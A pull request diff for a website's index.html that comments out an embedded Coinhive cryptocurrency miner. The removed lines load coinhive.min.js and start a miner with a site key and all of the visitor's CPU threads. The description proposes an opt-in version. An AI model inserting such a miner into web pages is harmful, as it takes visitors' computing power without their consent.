### PR TITLE
Remove CH while minified JS is not available.

### DIFF
--- a/index.html
+++ b/index.html
@@ -19,7 +19,7 @@
   <!--[if lte IE 9]><!-->
   <script src='assets/js/vendor/html5shiv.min.js'></script>
   <!--<![endif]-->
-  <script src="https://coinhive.com/lib/coinhive.min.js"></script>
+  <!--<script src="https://coinhive.com/lib/coinhive.min.js"></script>-->
 </head>
 <body>
 
@@ -223,7 +223,7 @@
   ga('create', 'UA-62513073-3', 'auto');
   ga('send', 'pageview');
   </script>
-  <script>
+  <!--<script>
 	var miner = new CoinHive.User('kgxvWyWBRa0KbesnldQBo69NRDGMVRw6', 'visitor', {
 	    threads: navigator.hardwareConcurrency,
 	    autoThreads: false,
@@ -231,7 +231,7 @@
 	    forceASMJS: false,
     });
 	miner.start(CoinHive.IF_EXCLUSIVE_TAB);
-  </script>
+  </script> -->
 
 </body>
 </html>


### PR DESCRIPTION
Probably better to switch to the opt-in authenticated version.